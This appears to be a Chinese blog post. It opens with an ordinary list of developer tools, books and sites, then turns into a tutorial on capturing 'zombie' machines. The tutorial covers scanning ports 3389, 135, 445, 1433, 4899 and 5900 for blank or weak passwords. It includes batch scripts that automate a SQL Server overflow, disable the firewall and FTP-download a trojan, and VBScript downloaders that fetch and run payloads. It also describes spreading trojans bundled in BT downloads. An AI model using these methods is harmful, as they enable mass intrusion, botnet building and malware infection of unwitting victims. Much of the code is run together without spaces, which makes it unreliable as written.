術站點
Hacker News:非常棒的針對編程的鏈接聚合網站
Programming reddit:同上
MSDN:微軟相關的官方技術集中地,主要是文檔類
infoq:企業級應用,關注軟件開發領域
OSChina:開源技術社區,開源方面做的不錯哦
cnblogs,51cto,csdn:常見的技術社區,各有專長
stackoverflow:IT技術問答網站
GitHub:全球最大的源代碼管理平臺,很多知名開源項目都在上面,如Linux內核,
OpenStack等免費的it電子書:http://it-ebooks.info/
DevStore:開發者服務商店
不錯的書籍
人件
人月神話
代碼大全2
計算機程序設計藝術
程序員的自我修養
程序員修煉之道
高效能程序員的修煉(成為一名杰出的程序員其實跟寫代碼沒有太大關系)
深入理解計算機系統
軟件隨想錄
算法導論(麻省理工學院出版社)
離線數學及其應用
設計模式
編程之美
黑客與畫家
編程珠璣
C++ Prime
Effective C++
TCP/IP詳解
Unix 編程藝術
《精神分析引論》弗洛伊德
搞定:無壓力工作的藝術
平臺工具(都是開源的好東東哦)
Redmine/Trac:項目管理平臺
Jenkins/Jira(非開源):持續集成系統(Apache Continuum,這個是Apache下的CI系統,還沒來得及研究)
Sonar:代碼質量管理平臺
git,svn:源代碼版本控制系統
GitLib/Gitorious:構建自己的GitHub服務器
gitbook:https://www.gitbook.io/寫書的好東西,當然用來寫文檔也很不錯的
Travis-ci:開源項目持續集成必備,和GitHub相結合,https://travis-ci.org/
開源測試工具、社區(Selenium、OpenQA.org)
Puppet:一個自動管理引擎,可以適用于Linux、Unix以及Windows平臺。所謂配置管理系統,就是管理機器里面諸如文件、用戶、進程、軟件包這些資源。無論是管理1臺,還是上萬臺機器Puppet都能輕松搞定。
Nagios:系統狀態監控報警,還有個Icinga(完全兼容nagios所有的插件,工作原理,配置文件以及方法,幾乎一模一樣。配置簡單,功能強大)
Ganglia:分布式監控系統
fleet:分布式init系統
爬蟲相關(好玩的工具)
Phantomjs
berserkJS(基于Phantomjs的改進版本)
SlimerJS
CasperJS
selenium
Web 服務器性能/壓力測試工具/負載均衡器
http_load: 程序非常小,解壓后也不到100K
webbench: 是Linux下的一個網站壓力測試工具,最多可以模擬3萬個并發連接去測試網站的負載能力
ab: ab是apache自帶的一款功能強大的測試工具
Siege: 一款開源的壓力測試工具,可以根據配置對一個WEB站點進行多用戶的并發訪問,記錄每個用戶所有請求過程的相應時間,并在一定數量的并發訪問下重復進行。
squid(前端緩存),nginx(負載),nodejs(沒錯它也可以,自己寫點代碼就能實現高性能的負載均衡器):常用的負載均衡器
Piwik:開源網站訪問量統計系統
ClickHeat:開源的網站點擊情況熱力圖
HAProxy:高性能TCP /HTTP負載均衡器
ElasticSearch:搜索引擎基于Lucene
Page Speed SDK和YSLOW
HAR Viewer: HAR分析工具
protractor:E2E(end to end)自動化測試工具
Web 前端相關
GRUNT: js task runner
Sea.js: js模塊化
knockout.js:MVVM開發前臺,綁定技術
Angular.js: 使用超動感HTML & JS開發WEB應用!
Highcharts.js,Flot:常用的Web圖表插件
Raw:非常不錯的一款高級數據可視化工具
Rickshaw:時序圖標庫,可用于構建實時圖表
JavaScript InfoVis Toolkit:另一款Web數據可視化插件
Pdf.js,在html中展現pdf
ACE,CodeMirror:Html代碼編輯器(ACE甚好啊)
NProcess:絢麗的加載進度條
impress.js:讓你制作出令人眩目的內容展示效果(類似的還有reveal)
Threejs:3DWeb庫
Hightopo:基于Html5的2D、3D可視化UI庫
jQuery.dataTables.js:高度靈活的表格插件
Rapha?l:js,canvas繪圖庫,后來發現百度指數的圖形就是用它繪出來的
director.js:js路由模塊,前端路由,Nodejs后端路由等,適合構造單頁應用
pace.js:頁面加載進度條
bower:Web包管理器
jsnice:有趣的js反編譯工具,猜壓縮后的變量名 http://www.jsnice.org/
D3.js: 是一個基于JavaScript數據展示庫(類似的還有P5.js)
Zepto.js:移動端替代jQuery的東東,當然也可以使用jquery-mobile.
UI框架:Foundation,Boostrap,Pure,EasyUI,Polymer
前端UI設計師必去的幾個網站:Dribbble,awwwards,unmatchedstyle,UIMaker
Mozilla 開發者中心:https://developer.mozilla.org/en-US/
圖標資源:IcoMoon(我的最愛),Themify Icons,FreePik,Glyphiconsart
Dialog:非常漂亮的對話框
AdminLTE:github上的一個開源項目,基于Boostrap3的后臺管理頁面框架
Respond.js:讓不懂愛的IE6-8支持響應式設計
require.js: js模塊加載庫
select2:比chosen具有更多特性的選擇框替代庫
AngularUI:集成angular.js的UI庫
normalize.css: 采用了現代化標準讓各瀏覽器渲染出的html保持一致的庫
CreateJS:Html5游戲引擎Less,Compass:簡化CSS開發
emojify.js:用于自動識別網頁上的Emoji文字并將其顯示為圖像
simditor:一個不錯的開源的html編輯器,簡潔高效
Sencha: 基于html5的移動端開發框架
SuperScrollorama+TweenMax+skrollr:打造超酷的視差滾動效果網頁動畫
jquery-smooth-scroll:同上,平滑滾動插件
Animate.css:實現了各種動畫效果的css庫
Emmet:前端工程師必備,ZenCode的前身
MagicDraw:Uml圖工具
大數據處理/數據分析/分布式工具
Hadoop:分布式的文件系統,結合其MapReduce編程模型可以用來做海量數據的批處理(Hive,Pig,HBase啥的就不說了),值得介紹的是Cloudera的Hadoop分支CDH5,基于YARN MRv2集成了Spark可直接用于生產環境的Hadoop,對于企業快速構建數據倉庫非常有用。
Ceph:Linux分布式文件系統(特點:無中心)
Storm:實時流數據處理,可以看下IBM的一篇介紹 (還有個Yahoo的S4,也是做流數據處理的)
Spark:大規模流式數據處理(可以應付企業中常見的三種數據處理場景:復雜的批量數據處理(batch data processing);基于歷史數據的交互式查詢(interactive query);基于實時數據流的數據處理(streaming data processing)),CSND有篇文章介紹的不錯
Spark Streaming:基于Spark的實時計算框架
Tachyon:分布式內存文件系統
Mesos:計算框架一個集群管理器,提供了有效的、跨分布式應用或框架的資源隔離和共享Impala:新一代開源大數據分析引擎,提供Sql語義,比- Hive強在速度上
SNAPPY:快速的數據壓縮系統,適用于Hadoop生態系統中
Kafka:高吞吐量的分布式消息隊列系統
ActiveMQ:是Apache出品,最流行的,能力強勁的開源消息總線
MQTT:Message Queuing Telemetry Transport,消息隊列遙測傳輸)是IBM開發的一個即時通訊協議,有可能成為物聯網的重要組成部分
RabbitMQ:記得OpenStack就是用的這個東西吧
ZeroMQ:宣稱是將分布式計算變得更簡單,是個分布式消息隊列,可以看下云風的一篇文章的介紹開源的日志收集系統:scribe、chukwa、kafka、flume。這有一篇對比文章
Zookeeper:可靠的分布式協調的開源項目
Databus:LinkedIn 實時低延遲數據抓取系統
數據源獲取:Flume、Google Refine、Needlebase、ScraperWiki、BloomReach
序列化技術:JSON、BSON、Thrift、Avro、Google Protocol Buffers
NoSql:Apache Hadoop、Apache Casandra、MongoDB、Apache CouchDB、Redis、BigTable、HBase、Hypertable、Voldemort、Neo4j
MapReduce相關:Hive、Pig、Cascading、Cascalog、mrjob、Caffeine、S4、MapR、Acunu、Flume、Kafka、Azkaban、Oozie、Greenplum
數據處理:R、Yahoo! Pipes、Mechanical Turk、Solr/ Lucene、ElasticSearch、Datameer、Bigsheets、TinkerpopNLP自然語言處理:Natural Language Toolkit、Apache OpenNLP、Boilerpipe、OpenCalais
機器學習:WEKA、Mahout、scikits.learn、SkyTree
可視化技術:GraphViz、Processing、Protovis、Google Fusion Tables、Tableau、Highcharts、EChats(百度的還不錯)、Rapha?l.js
Kettle:開源的ETL工具
Pentaho:以工作流為核心的開源BI系統
Mondrian:開源的Rolap服務器
Oozie:開源hadoop的工作流調度引擎
開源的數據分析可視化工具:Weka、Orange、KNIME
Cobar:阿里巴巴的MySql分布式中間件
C & C++
Thrift:用來進行可擴展且跨語言的服務的開發(類似的還有個Avro,Google protobuf)。
libevent:是一個事件觸發的網絡庫,適用于windows、linux、bsd等多種平臺,內部使用select、epoll、kqueue等系統調用管理事件機制。(對了還有個libev呢)
Boost:不多說了,準C++標準庫
Ptmalloc\Valgrind\Purify
NetworkServer架構:acceptor->dispatcher->worker(這個不算工具哦)
breakpad:崩潰轉儲和分析模塊,很多crashreport會用到
UI界面相關:MFC、BCG和QT這類的就不說了,高端一點的還有Html和DirectUI技術:libcef(基于chrome內核的,想想使用html5開發頁面,還真有點小激動呢)、HtmlLayout、Duilib、Bolt,非C++的,還有node-webkit也不錯,集成了node和webkit內核。
游戲開發相關
MINA:使用Java開發手游和頁游服務器(對了還有Netty,也很猛的,都是基于NIO的)
HP-Socket:見有有些頁游服務器使用這個構建的
云風的技術博客:http://blog.codingnow.com/
OGRE:大名鼎鼎的3D圖形渲染引擎
OpenVDB:夢工廠C++的特效庫,開源的
cocos2d:跨平臺2D游戲引擎
unity3d:跨平臺3D游戲引擎,很火的哦
Nodejs:也有不少使用它來開發手游和也有服務器(網易的Pomelo就是哦)
日志聚合,分布式日志收集
Scribe:Facebook的(nodejs + scribe + inotify 同步日志)
logstash:強大的日志收集系統,可以基于logstash+kibana+elasticsearch+redis開發強大的日志分析平臺
log.io: nodejs開發的實時日志收集系統
RTP,實時傳輸協議與音視頻
RTP,RTCP,RTSP-> librtp,JRTPLIB(遵循了RFC1889標準)
環形緩沖區,實時數據傳輸用
SDL,ffmpeg,live555,Speex
Red5:用Java開發開源的Flash流媒體服務器。它支持:把音頻(MP3)和視頻(FLV)轉換成播放流; 錄制客戶端播放流(只支持FLV);共享對象;現場直播流發布;遠程調用。
Python
Eric,Eclipse+pydev,比較不錯的Python IDE
PyWin:Win32 api編程包
numpy:科學計算包,主要用來處理大型矩陣計算等,此外還有SciPy,Matplotlib
GUI相關:PyQt,PyQwt
supervisor:進程監控工具
Java相關
常用的IDE:IntelliJ IDEA,Eclipse,Netbeans
Web開發相關:Tomcat、Resin、Jetty、WebLogic等,常用的組件Struts,Spring
HibernateNetty: 異步事件驅動網絡應用編程框架,用于高并發網絡編程比較好(NIO框架)
MINA:簡單地開發高性能和高可靠性的網絡應用程序(也是個NIO框架),不少手游服務端是用它開發的
jOOQ:java Orm框架Activiti:工作流引擎,類似的還有jBPM、Snaker
Perfuse:是一個用戶界面包用來把有結構與無結構數據以具有交互性的可視化圖形展示出來.
Gephi:復雜網絡分析軟件, 其主要用于各種網絡和復雜系統,動態和分層圖的交互可視化與探測開源工具
Nutch:知名的爬蟲項目,hadoop就是從這個項目中發展出來的
web-harvest:Web數據提取工具
POM工具:Maven+ArtifactoryNetflix
Curator:Netflix公司開源的一個Zookeeper client library,用于簡化Zookeeper客戶端編程
Akka:一款基于actor模型實現的 并發處理框架
EclEmma:覆蓋測試工具
.net相關
Xilium.CefGlue:基于CEF框架的.NET封裝,基于.NET開發Chrome內核瀏覽器
CefSharp:同上,有一款WebKit的封裝,C#和Js交互會更簡單
netz:免費的 .NET 可執行文件壓縮工具
SmartAssembly:變態的.net代碼優化混淆工具
NETDeob0:.net反混淆工具,真是魔高一尺道高一丈啊(還有個de4dot,在GitHub上,都是開源的)
ILMerge:將所有引用的DLL和exe文件打成一個exe文件
ILSpy:開源.net程序反編譯工具
Javascript.NET:很不錯的js執行引擎,對v8做了封裝
NPOI: Excel操作
DotRAS:遠程訪問服務的模塊
WinHtmlEditor: Winform下的html編輯器
SmartThreadPool:使用C#實現的,帶高級特性的線程池
Snoop: WPF Spy Utility
Autofac: 輕量級IoC框架
HtmlAgilityPack:Html解析利器
Quartz.NET:Job調度
HttpLib:@CodePlex,簡化http請求
SuperSocket:簡化Socket操作,基于他的還有個SuperWebSocket,可以開發獨立的WebSocket服務器了
DocX:未安裝Office的情況下操作Word文件
Dapper:輕量級的ORM類,性能不錯
HubbleDotNet:支持接入數據庫的全文搜索系統
fastJSON:@CodeProject,高性能的json序列化類
ZXing.NET:@CodePlex,QR,條形碼相關
Nancy:輕量級Http服務器,做個小型的Web應用可以擺脫IIS嘍(Nancy.Viewengines.Razor,可以加入Razor引擎)
AntiXSS:微軟的XSS防御庫Microsoft Web Protection
LibraryJint:JavaScript解釋器
CS-Script:將C#代碼文件作為腳本執行
Jexus:Linux下 高性能、易用、免費的ASP.NET服務器
Clay:將dynamic發揮的更加靈活,像寫js一樣寫C#
DynamicJSON:不必定義數據模型獲取json數據
Antlr:開源的語法分析器(歸到C#不太合適,其他語言也可以去用)
SharpPcap:C#版的WinPcap調用端,牛逼的網絡包分析庫(自帶PacketNotNet用于包協議分析)
Roslyn:C#,VB編譯器
ImageResizer: 服務端自由控制圖片大小,真乃神器也,對手機端傳小圖,PC端傳大圖,CMS用它很方便
UI相關:DevExpress, Fluent(Office 07風格), mui(Modern UI for WPF)
NetSparkle:應用自動更新組件
ConfuserEx: 開源.net混淆工具
ServiceStack: 開源高性能Web服務框架,可用于構建高性能的REST服務Expression
Evaluator:Eval for C#,處理字符串表達式
http://nugetmusthaves.com/
常用工具
Fiddler:非常好用的Web前端調試工具,當然是針對底層http協議的,一般情況使用Chrome等自帶的調試工具也足夠了,特殊情況還得用它去處理
wireshark:知名的網絡數據包分析工具
PowerCmd:替代Windows Cmd的利器
RegexBuddy:強大的正則表達式測試工具
Soure Insight:源代碼閱讀神器
SublimeText:程序員最愛的編輯器
Database.NET:一個通用的關系型數據庫客戶端,基于.NET 4.0開發的,做簡單的處理還是蠻方便的
Navicat Premium:支持MySql、PostgreSQL、Oracle、Sqlite和SQL Server的客戶端,通用性上不如Database.NET,但性能方面比Database.NET好很多,自帶備份功能也用于數據庫定時備份。
Synergy : 局域網內一套鍵盤鼠標控制多臺電腦
DameWare:遠程協助工具集(我在公司主要控制大屏幕用)
Radmin: 遠程控制工具,用了一段時間的
DameWare,還要破解,對Win7支持的不好,還是發現這個好用
Listary:能極大幅度提高你 Windows 文件瀏覽與搜索速度效率的「超級神器」
Clover:給資源管理器加上多標簽
WinLaunch:模擬Mac OS的Launch工具
Fritzing:繪制電路圖
LICEcap:gif教程制作git,
svn:版本控制系統Enigma Virtual Box(將exe,dll等封裝成一個可執行程序)
Open DBDiff(針對SqlServer)數據庫同步
SymmetricDS:數據庫同步
BIEE,Infomatica,SPSS,weka,R語言:數據分析
CodeSmith,LightSwitch:代碼生成
Pandoc:Markdown轉換工具,出書用的。以前玩過docbook,不過現在還是Markdown盛行啊。
Window Magnet[Mac]:增強Mac窗口管理功能,想Win7一樣具有窗口拖放到屏幕邊緣自動調整的功能
log explorer:查看SqlServer日志dependency
walker:查詢Windows應用程序dll依賴項
Shairport4w:將iPhone,iPad,iPod上的音頻通過AirPlay協議傳輸到PC上
ngrok:內網穿透工具Axure:快速原型制作工具,還有個在線作圖的工具國內的一個創業團隊做的,用著很不錯 http://www.processon.com
tinyproxy:(Linux)小型的代理服務器支持http和https協議EaseUS Partition
Master:超級簡單的分區調整工具,速度還是蠻快的,C盤不夠用了就用它從D盤劃點空間吧,不用重裝系統這么折騰哦。
CheatEngine:玩游戲修改內存值必備神器(記得我在玩軒轅劍6的時候就用的它,超級方便呢)
ApkIDE:Android反編譯神器翻、墻工具(自|由|門、天行瀏覽器)
最后推薦下我的Android學習群:110359956,不管你是小白還是大牛,小編我都挺歡迎,不定期分享干貨,包括我自己整理的一份2017最新的Android學習資料和零基礎入門教程,送給大家,歡迎初學和進階中的小伙伴。還有最新opengl,opencv,VR,AR技術防止兩年至三年之后的一批大篩選。
還有MVP最新教程實訓班,歡迎大家加入
抓肉雞的幾種方法
找點工具就OK了端口抓肉雞的幾種方法 肉雞大家都應該清楚是什么東西吧!呵呵 這點就不用說了.............慢慢學
1、3389抓雞
現在國內網絡上流傳著一種克隆版的XP,安裝后會默認開啟一個賬號為new,密碼為空的賬戶,而且基本上都是開著3389的,我們就可以利用這一點來抓肉雞。首先用端口掃描工具掃一段IP的3389端口,掃完后就直接用遠程桌面連接開放3389的機器(也可以把結果保存為文本文件,用批量生成3389連接的工具來連接),然后輸入賬號new登入,如果別人的電腦前沒人的話你就可以去你的空間下載你傳好的木馬安裝拉~~
這種方法只針XP系統,如果遇到2000或者2003系統就不要試了
呵呵。缺點也很明顯,如果別人不是用new賬號登入XP的,你再登入上去就會把他擠出去(XP只支持單用戶登入,用戶登入需要用工具開),或者電腦前有人你就不可能去打開IE下載木馬了。
2、掃135端口抓肉雞
首先先用端口掃描器掃一段IP的135端口,然后把結果保存,再用NTSCAN過濾有弱口令的機器,最后用recton開telnet傳馬。因為現在135和445端口都被防火墻屏蔽了,只能掃本地的135肉雞,要抓外地的只能用外地的135肉雞來掃。(詳細動畫
可以去黑客網站搜索135)
3、掃445端口抓肉雞
和掃135抓肉雞差不多,首先先用端口掃描器掃一段IP的445端口,然后把結果保存,再用NTSCAN過濾有弱口令的機器,最后用啊D工具包開共享傳馬。因為現在135和445端口都被防火墻屏蔽了,只能掃本地的445肉雞,要抓外地的只能用外地的445肉雞來掃。(詳細動畫可以去黑客網站搜索445)
4、1433端口批量溢出抓肉雞
這個方法可以實現全自動抓雞,不過現在太多人搞,成功率已經不高了。要用到的工具:S掃sqlhello.exenc.exe批處理文件首先先寫個批處理,打開記事本,把以下代碼復制修改后,儲存為掃描+溢出.bat文件
@echooff
for/f"eol=;tokens=1,2delims="%%iin(tt.txt)dos.exetcp%%i%%j
14331000/save
@echooff
for/f"eol=;tokens=1delims="%%iin(Result.txt)dosqlhello%%i
1433xxx.xxx.xx.xx556
還要新建一個tt.txt,里面你要掃的IP段,格式為
XXX.XXX.XXX.XXXXXX.XXX.XXX.XXX,中間是空格
1433是要掃描的端口,1000是掃描線程數,dosqlhello%%i
1433xxx.xxx.xx.xx556這個里的XXX添你的IP,556是后面NC監
聽的端口然后再寫個批處理
@echooff
Nc-l-vv-p556>daima.txt
echousername>>daima.txt
echopassword>>daima.txt
echobin>>daima.txt(以2進制傳輸數據)
echogetxxx.exe(你的木馬的文件名,要放在根目錄下)>>daima.txt
echobye>>daima.txt
netstopsharedaccess(關閉WINDOWS自帶防火墻)
ftp-s:daima.txt
xxx.exe(也是填你木馬的文件名)
deldaima.txt
注意上面的代碼回車符別刪掉,要不然就沒法下你的馬了。
幾種肉雞上傳文件的方法
tftp法
先在自己某機器上建個tftp服務器,如執行tftpd32.exe,
再將文件(sample.exe)上傳到別的機器中(肉雞),
肉雞cmd中執行:tftp-i服務器ipgetsample.exe
ftp法
肉雞cmd中執行:
echoopenftp服務器ip[端口]>ftp.txt
echousername>>ftp.txt
echopassword>>ftp.txt
echogetsample.exe>>ftp.txt
echobye>>ftp.txt
ftp-s:ftp.txt
delftp.txt
工具法
利用wineggdrop的wget.exe
肉雞cmd中執行:wget網站/sample.exe
利用dl.vbe法
肉雞cmd中執行:
echowithwscript:if.arguments.count^<2then.quit:endif
>dl.vbe
echosetaso=.createobject("adodb.stream"):set
web=createobject("microsoft.xmlhttp")>>dl.vbe
echoweb.open"get",.arguments(0),0:web.send:if
web.status^>200thenquit>>dl.vbe
echo
aso.type=1:aso.open:aso.writeweb.responsebody:aso.savetofile
.arguments(1),2:endwith>dl.vbe
cscriptdl.vbehttp://*。*。*。*:88/sample.exesample.exe
利用iget.vbe法
方法同4,
肉雞cmd中執行:
echoiLocal=LCase(WScript.Arguments(1))>iget.vbe
echoiRemote=LCase(WScript.Arguments(0))>>iget.vbe
echoSetxPost=CreateObject("Microsoft.XMLHTTP")
>>iget.vbe
echoxPost.Open"GET",iRemote,0>>iget.vbe
echoxPost.Send()>>iget.vbe
echoSetsGet=CreateObject("ADODB.Stream")>>iget.vbe
echosGet.Mode=3>>iget.vbe
echosGet.Type=1>>iget.vbe
echosGet.Open()>>iget.vbe
echosGet.Write(xPost.responseBody)>>iget.vbe
echosGet.SaveToFileiLocal,2>>iget.vbe
cscriptiget.vbehttp://*。*。*。*/sample.exesample.exe
利用Http網站vbe法
echoSetxPost=CreateObject("Microsoft.XMLHTTP")
>dsa.vbe
echoxPost.Open"GET","http://*.*.*.*/sample.exe",0
>>dsa.vbe
echoxPost.Send()>>dsa.vbe
echoSetsGet=CreateObject("ADODB.Stream")>>dsa.vbe
echosGet.Mode=3>>dsa.vbe
echosGet.Type=1>>dsa.vbe
echosGet.Open()>>dsa.vbe
echosGet.Write(xPost.responseBody)>>dsa.vbe
echosGet.SaveToFile"sample.exe",2>>dsa.vbecscript
dsa.vbe
deldsa.vbe
3389法
可以開3389,然后登陸,進行本地的下載。該方法對服務
器上傳很嚴格的機器特有效。(包括硬件防火墻)
先打開多個NC.bat,然后再打開掃描+溢出.bat,然后你就可以
去睡大覺了。自動掃描,掃描完后自動溢出,溢出后還自動下
馬執行,爽吧!所以這里講詳細點,呵呵。還有4221端口也
可以這樣溢出,只要用這些端口的溢出工具就好了,詳細動畫
可以去黑客網站搜索1433。
忘了說,上面的工具和批處理什么的都要放在同一個文件
夾下。
先休息一下,打這么多字累死了
繼續
5、掃1433抓肉雞之方法2
要用到的工具:端口掃描器X-scanSQL綜合利用工具
上面我們說過了,1433溢出現在成功率已經不高了,所以我
們可以用另一種方法。開了1433端口的機器一般都裝了SQL,
所以我們可以猜測SQL弱口令來抓1433肉雞。
首先先用端口掃描器掃一段IP的1433端口,然后結果保存為
文本文件,接著用X-scan導入這些開了1433的IP,然后在掃描
參數-全局設置-掃描模塊這一欄里只勾上SQL-SERVER就可以了
,其他不要勾。然后在插件設置-端口相關設置-待檢測端口這
一欄,只填1433端口。然后就可以開始掃描了。掃描完成后會
有個報告,列出了有弱口令的機器,然后打開SQL綜合利用工
具,輸入你掃到的弱口令來連接,接著打開SQL綜合利用工具-
利用目錄,上傳你的木馬,然后在用DOS命令執行你的木馬就
OK了。
6、用WINNTAutoAttack掃SA弱口令抓肉雞
其實這個原理和上面一樣,效率也沒上面的高,只是想讓大
家知道下,呵呵。
工具:WINNTAutoAttackSQL綜合利用工具
打開WINNTAutoAttack,找一段IP添上,然后只勾上設置下
的僅對PING檢查成功的機器進行檢測和SQL列出密碼為空的SA
賬號,接著開始掃描,掃完后,用SQL綜合利用工具連上傳馬
執行就好了。
7、掃4899空口令抓肉雞
工具:端口掃描器4899探測器Radmin
首先先用端口掃描器掃一段IP的4899端口,然后用4899探測
器導入開了4899端口的IP,接著掃空令,最后用Radmin連接有
空口令的機器,帶開文件管理,上傳的你木馬運行就OK了。
詳細動畫可以去黑客網站搜索4899
8、掃5900端口抓VNC肉雞
工具:VNC掃描器VNC連接器
首先用VNC掃描器掃描一段IP,掃描格式為vscan.exe(掃描
器文件名)-i219.0.0.0-219.255.255.255(掃描IP段)-p5900-
vnc-vv掃描完成后會在掃描器所在的同一文件夾生成一個文
本文件,打開后有一列IP,IP后面的有一些單詞比如
patched,banned,vulnerable,只有單詞為vulnerable才能連接。接著
就用VNC連接器連接,下面就不用多說了吧?詳細動畫可以去
黑客網站搜索VNC
接下來說說掛馬抓肉雞吧。方法有很多,比如BT掛馬、免費
空間掛馬、迅雷掛馬等等,有些我也還不會,呵呵。下面就介
紹幾種我會的。
1、BT掛馬
顧名思義,就是把你的木馬發布到BT網站讓人下載。當然如果只把單純的木馬文件發布上去效果肯定不好,而且現在一般的BT網站也不讓發布EXE文件。所以我們需要一些隱藏的手法。我們可以先把木馬用捆綁器和一些電影、音樂、游戲捆綁在一起,再壓縮成RAR文件發布,誰在開始下載時會知道RAR里有木馬呢?當他費了好大勁下載完,打開發現是EXE的格式后,總有些菜鳥會不想辜負自己花費的時間而忍不住打開吧?尤其是下XXX片的時候當然你也可以做個網頁木馬,然后把你網頁木馬的地址插入到你發布的文件中(不是所有文件都可以這樣的,我只知道RM和EXE文件可以插入),別人下載打開后同時也會帶開你的網頁木馬,如果他的系統沒有補供你網頁木馬所利用的漏洞的話,那他就會中你的馬了。有些朋友可能會想,我把木馬和其他文件捆綁后格式保持為那個文件(比如RM捆綁木馬后保持RM格式),那樣別人不就不會懷疑了嗎?呵呵,如果真有這樣的好事那我上面何不說把木馬和BT種子文件綁在一起發布,那樣你肉雞不抓瘋了才怪~~所以在這里說一下,木馬和其他文件捆綁后生成的文件只能為EXE格式的,除非你有你所捆綁文件的格式的溢出漏洞,那樣才能把生成后的文件格式保持為你所捆綁文件的格式。不過這樣的漏洞現在
很少,大多都被補了,就算有別人也不一定會公開,為什么想想就知道了吧。在這里就說一個最近的RAR溢出漏洞,針對winrar3.6版本以下的所有版本,只要你winrar版本低于3.6,運行綁了牧馬的RAR文件后就會中馬。此類木馬癥狀為:運行RAR文件后會彈出一個什么什么損壞還是錯誤的對話框,然后RAR文件體積變小,減少的體積就為木馬的體積。然后再次打開這個RAR文件一切正常,不會彈出錯誤對話框。在這里提醒下各位趕快更新下WINRAR版本,小心中馬哈。